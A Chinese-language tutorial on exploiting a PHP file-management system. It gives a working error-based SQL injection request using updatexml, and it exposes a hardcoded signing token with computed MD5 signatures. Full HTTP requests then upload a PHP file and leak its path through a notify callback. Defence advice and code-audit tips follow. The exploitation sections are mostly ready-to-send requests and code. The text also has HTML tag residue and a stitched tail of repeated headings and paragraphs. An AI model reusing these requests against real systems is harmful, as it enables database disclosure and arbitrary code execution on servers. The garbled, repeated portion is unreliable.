0.5day漏洞分析与利用教学文档<\/h1>

1. SQL注入漏洞分析<\/h2>

1.1 漏洞背景<\/h3>
该漏洞存在于一个文件管理系统，当查询文件列表时，系统会生成SQL语句但不立即执行，导致特殊字符未被正确处理，最终通过UNION操作造成SQL注入。<\/p>

1.2 漏洞原理<\/h3>

框架使用fetchSql(true)<\/code>仅生成SQL而不执行<\/li>
生成的SQL语句中包含未转义的特殊字符(如单引号)<\/li>

最终通过UNION操作将恶意SQL片段拼接到查询中<\/li>
<\/ol>
1.3 关键代码分析<\/h3>
\/\/ 生成的SQL语句示例
<\/span><\/span><\/span><\/span>string<\/span>(221<\/span>) "SELECT `id`,`uid`,`shares_id`,origin_name as name,`ext`,`size`,`count_down`,`count_open`,`update_time` FROM `sk_stores` WHERE  `uid` = 10  AND `parent_folder` = 3'  AND `delete_time` IS NULL  AND `origin_name` LIKE '%aa%'"<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 最终执行的恶意SQL
<\/span><\/span><\/span><\/span>SELECT<\/span> `id`<\/span>,`uid`<\/span>,`shares_id`<\/span>,folder_name<\/span> as<\/span> name<\/span>,`ext`<\/span>,`size`<\/span>,`count_down`<\/span>,`count_open`<\/span>,`update_time`<\/span> FROM<\/span> `sk_folders`<\/span> WHERE<\/span>  `uid`<\/span> =<\/span> 10<\/span>  AND<\/span> `parent_folder`<\/span> =<\/span> '3'<\/span>  AND<\/span> `delete_time`<\/span> IS<\/span> NULL<\/span>  AND<\/span> `folder_name`<\/span> LIKE<\/span> '%aa%'<\/span> 
<\/span><\/span>
<\/span><\/span>UNION<\/span> ALL<\/span> 
<\/span><\/span>
<\/span><\/span>( SELECT<\/span> `id`<\/span>,`uid`<\/span>,`shares_id`<\/span>,origin_name<\/span> as<\/span> name<\/span>,`ext`<\/span>,`size`<\/span>,`count_down`<\/span>,`count_open`<\/span>,`update_time`<\/span> FROM<\/span> `sk_stores`<\/span> WHERE<\/span>  `uid`<\/span> =<\/span> 10<\/span>  AND<\/span> `parent_folder`<\/span> =<\/span> 3<\/span>  AND<\/span> `delete_time`<\/span> IS<\/span> NULL<\/span>  AND<\/span> `origin_name`<\/span> LIKE<\/span> '%aa%'<\/span> ) LIMIT<\/span> 0<\/span>,20<\/span>
<\/span><\/span><\/code><\/pre>1.4 漏洞利用<\/h3>
通过构造特殊参数触发XPath错误泄露数据库信息：<\/p>
GET \/file\/list?folder_id=1-updatexml(1,concat(0x7e,database(),0x7e),1)&search=&page=&rows= HTTP\/1.1
<\/code><\/pre>
2. 文件上传漏洞分析<\/h2>
2.1 漏洞背景<\/h3>
系统存在一个受保护的文件上传功能，通过绕过签名验证和利用通知机制，攻击者可以实现任意文件上传并获取上传路径。<\/p>
2.2 漏洞原理<\/h3>

上传功能位于public\/server\/index.php<\/code>中的start()<\/code>方法<\/li>
虽然需要签名验证，但签名密钥硬编码在配置中<\/li>
上传后通过upload_notify<\/code>函数泄露文件路径<\/li>
<\/ol>
2.3 签名验证机制<\/h3>

签名算法：md5("md=upload&uid=1asdasfasfasfasfasfa")<\/code><\/li>
硬编码token：asdasfasfasfasfasfa<\/code><\/li>
签名验证逻辑：

从GET参数构建参数字符串<\/li>
拼接硬编码token<\/li>
计算MD5并与传入的sign参数比较<\/li>
<\/ul>
<\/li>
<\/ol>
2.4 漏洞利用步骤<\/h3>
2.4.1 生成有效签名<\/h4>
<?<\/span>php<\/span> echo<\/span> md5<\/span>("md=upload&uid=1asdasfasfasfasfasfa"<\/span>);?><\/span>
<\/span><\/span><\/span>\/\/ 输出: e8766abd8742eb67a2c07b089ecf636a
<\/span><\/span><\/span><\/code><\/pre>2.4.2 上传恶意文件<\/h4>
POST \/server\/index.php\/start?md=upload&uid=1&sign=e8766abd8742eb67a2c07b089ecf636a HTTP\/1.1
Host: wp.com
Content-Type: multipart\/form-data; boundary=--------------------------570796120375390059114427

----------------------------570796120375390059114427
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application\/x-httpd-php

<?php phpinfo(); ?>
----------------------------570796120375390059114427--
<\/code><\/pre>
2.4.3 获取上传路径<\/h4>

利用upload_notify<\/code>功能泄露路径<\/li>
生成通知请求签名：<\/li>
<\/ol>
echo<\/span> md5<\/span>("md=upload&notify=http:\/\/127.0.0.1:8877\/&uid=1asdasfasfasfasfasfa"<\/span>);
<\/span><\/span>\/\/ 输出: 88c03d47ed5a1df9ed7ed9e1c1ce8afd
<\/span><\/span><\/span><\/code><\/pre>
发送带通知的请求：<\/li>
<\/ol>
POST \/server\/index.php\/start?md=upload&uid=1&notify=http:\/\/127.0.0.1:8877\/&sign=88c03d47ed5a1df9ed7ed9e1c1ce8afd HTTP\/1.1
Host: wp.com
Content-Type: multipart\/form-data; boundary=--------------------------570796120375390059114427
[同上文件内容]
<\/code><\/pre>
3. 防御建议<\/h2>
3.1 SQL注入防御<\/h3>

始终使用参数化查询或预处理语句<\/li>
避免使用fetchSql(true)<\/code>生成未处理的SQL<\/li>
对用户输入进行严格的过滤和转义<\/li>
禁用危险的SQL操作如UNION<\/li>
<\/ol>
3.2 文件上传防御<\/h3>

不要硬编码签名密钥<\/li>
实现更安全的签名算法(如HMAC)<\/li>
限制上传文件类型(白名单方式)<\/li>
禁止上传可执行文件(.php等)<\/li>
随机化上传文件路径和名称<\/li>
不要通过外部请求泄露敏感信息<\/li>
<\/ol>
4. 审计技巧总结<\/h2>

关注框架的特殊用法如fetchSql(true)<\/code><\/li>
追踪用户输入在整个处理流程中的变化<\/li>
对于签名验证机制，检查密钥是否可预测<\/li>
注意protected\/private方法的调用链<\/li>
使用PHPStorm等专业IDE进行代码审计<\/li>
多调试、多打印中间变量值<\/li>
关注文件操作函数(move_uploaded_file等)的使用场景<\/li>
<\/ol>

0.5day漏洞分析与利用教学文档<\/h1>

1. SQL注入漏洞分析<\/h2>

1.1 漏洞背景<\/h3> 该漏洞存在于一个文件管理系统，当查询文件列表时，系统会生成SQL语句但不立即执行，导致特殊字符未被正确处理，最终通过UNION操作造成SQL注入。<\/p>

2. 文件上传漏洞分析<\/h2>

2.1 漏洞背景<\/h3> 系统存在一个受保护的文件上传功能，通过绕过签名验证和利用通知机制，攻击者可以实现任意文件上传并获取上传路径。<\/p>

2.4 漏洞利用步骤<\/h3>

3. 防御建议<\/h2>

1.1 漏洞背景<\/h3>
该漏洞存在于一个文件管理系统，当查询文件列表时，系统会生成SQL语句但不立即执行，导致特殊字符未被正确处理，最终通过UNION操作造成SQL注入。<\/p>

2.1 漏洞背景<\/h3>
系统存在一个受保护的文件上传功能，通过绕过签名验证和利用通知机制，攻击者可以实现任意文件上传并获取上传路径。<\/p>